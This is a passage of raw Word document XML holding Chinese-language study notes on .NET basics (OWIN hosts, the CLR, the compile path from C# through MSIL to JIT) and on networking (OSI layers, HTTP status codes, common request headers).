        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Custom Host</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OwinHost.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Node.Js(connect-owin)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="3154"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="77"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:color w:val="02696D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="02696D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.NET CLR（Commen Language Runtime）公用语言运行时</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>核心：公共语言基础（Common Language Infrastructure，CLI）,提供了定义的规范接口、与工具</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.项目源代码被 .Net Framework编译器( csc , C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe )编译成EXE或者是DLL文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2.被CSC编译后的EXE/DLL文件叫做 IL文件。Intermediate Language （IL）中间语言，在.Net中，称之为 Microsoft IL（MSIL）微软中间语言(右键对项目进行生成的时候实际上就是这一步)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3.CLR会将MSIL通过JIT（Just In Time）编译器进行第二次编译，将其编译成本地平台的CPU指令。(如果拥有能在Linux运行的CLR，代码就能跨平台运行)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>C#源码——(CSC编译器)——MSIL文件(dll/exe)——(CLR中的JIT编译器)——CPU执行</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Http协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OSI协议与TCP/IP协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>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30" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4571365" cy="3218815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP/IP协议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:ind w:left="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>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31" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5085715" cy="3704590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OSI网络通信</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>物理层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="90"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>以二进制数据形式在物理媒体上传输数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据链路层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>传输有地址的帧，错误检测功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>网络层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为数据包选择路由</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IP，ICMP，RIP...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>传输层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>提供端对端的接口</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>TCP、UDP...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会话层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>建立或解除与其它接点的联系</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表示层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="95"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据格式化，代码转换，数据加密</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>应用层</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP，FTP，SMTP...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Http状态码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1xx:信息提示，表示请求已被成功接受，继续处理，请求范围100~101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2xx:成功，服务器成功响应请求，请求范围200~206</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3xx:重定向，请求范围300~305</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>4xx:发送一些服务器无法受理的东西</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="97"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>5xx:一条有效请求，但服务器挂了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>常用HTTP消息头(Http Header)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Request请求头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Authorization：Basic base64646464646464=== （验证）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Accept-Encoding：gzip （指定浏览器可以支持的web服务器返回内容压缩编码类型）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cache-Control：max-age=60（指定请求和响应遵循的缓存机制，max-age为 当前60秒内再次访问不会去服务器请求）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Cookie：ZJF（该请求域名下的所有cookie值一起发送给web服务器）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Content-Type：application/x-www-form-urlencoded（是以什么格式来传输，请求的与实体对应的MIME信息）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
